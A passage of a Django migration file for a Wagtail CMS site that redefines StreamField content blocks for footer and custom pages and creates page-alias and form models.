('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='footer',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('threecolumn', common.blocks.columns.RowBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='footer',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('columns', common.blocks.columns.RowBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tab_index', wagtail.wagtailcore.blocks.StructBlock((('display_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'vertical'), ('horizontal', 'horizontal')])), ('tabsIndexes', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.TextBlock(max_length=25, required=True)), ('display', wagtail.wagtailcore.blocks.TextBlock(max_length=40, required=True))))),)))))), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('tab_name', wagtail.wagtailcore.blocks.CharBlock()), ('tab_content', wagtail.wagtailcore.blocks.StreamBlock((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('paragraph', wagtail.wagtailcore.blocks.TextBlock()), ('customizedimage', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('tab_name', wagtail.wagtailcore.blocks.CharBlock()), ('tab_content', wagtail.wagtailcore.blocks.StreamBlock((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('paragraph', wagtail.wagtailcore.blocks.TextBlock()), ('customizedimage', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('name', wagtail.wagtailcore.blocks.CharBlock()), ('content', wagtail.wagtailcore.blocks.StreamBlock((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('paragraph', wagtail.wagtailcore.blocks.TextBlock()), ('customizedimage', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.CreateModel(
name='PageAlias',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('alias_for_page', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='aliases', to='wagtailcore.Page')),
('menu_order', models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='custompage',
name='custom_url',
field=models.CharField(blank=True, default='', max_length=256, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.CreateModel(
name='BlogTag',
fields=[
],
options={
'proxy': True,
},
bases=('taggit.tag',),
),
migrations.DeleteModel(
name='BlogTag',
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.CreateModel(
name='FormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
],
options={
'abstract': False,
'ordering': ['sort_order'],
},
),
migrations.CreateModel(
name='FormPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('to_address', models.CharField(blank=True, help_text='Optional - form submissions will be emailed to these addresses. Separate multiple addresses by comma.', max_length=255, verbose_name='to address')),
('from_address', models.CharField(blank=True, max_length=255, verbose_name='from address')),
('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
('intro', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('action', models.CharField(blank=True, help_text='Optional action for the form. This will default to the slug.', max_length=1000)),
('menu_order', models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='formfield',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='common.FormPage'),
),
migrations.RemoveField(
model_name='person',
name='title',
),
migrations.AlterField(
model_name='custompage',
name='content',
